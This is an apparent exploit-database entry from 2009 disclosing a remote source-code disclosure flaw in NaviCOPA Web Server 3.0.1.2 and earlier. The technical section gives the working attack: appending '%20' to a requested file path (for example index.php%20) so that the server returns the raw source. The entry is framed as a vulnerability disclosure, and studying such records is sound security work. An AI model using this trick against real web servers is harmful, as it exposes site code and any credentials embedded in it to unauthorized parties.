NaviCOPA <= 3.0.1.2 Source Disclosure

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : NaviCOPA <= 3.0.1.2 Source Disclosure
# Published : 2009-10-14
# Author : Dr_IDE
# Previous Title : Microsoft Internet Explorer 5,6,7 memory corruption PoC
# Next Title : ZoIPer Call-Info DoS

################################################
#
# NaviCOPA Web Server <= 3.0.1.2 Remote Source Disclosure
# Found By: Dr_IDE
# Tested On: Windows XPSP3
# Download: www.navicopa.com/download.html
#
################################################

- Description -

NaviCOPA Web Server <= 3.0.1.2 is a Windows based HTTP server. This is the latest
version of the application available.

NaviCOPA is vulnerable to remote arbitrary source code disclosure by the
following means.

- Technical Details -

http://[ webserver IP]/[ file ][%20]

http://172.16.2.101/index.html%20
http://172.16.2.101/index.php%20

[pocoftheday.blogspot.com]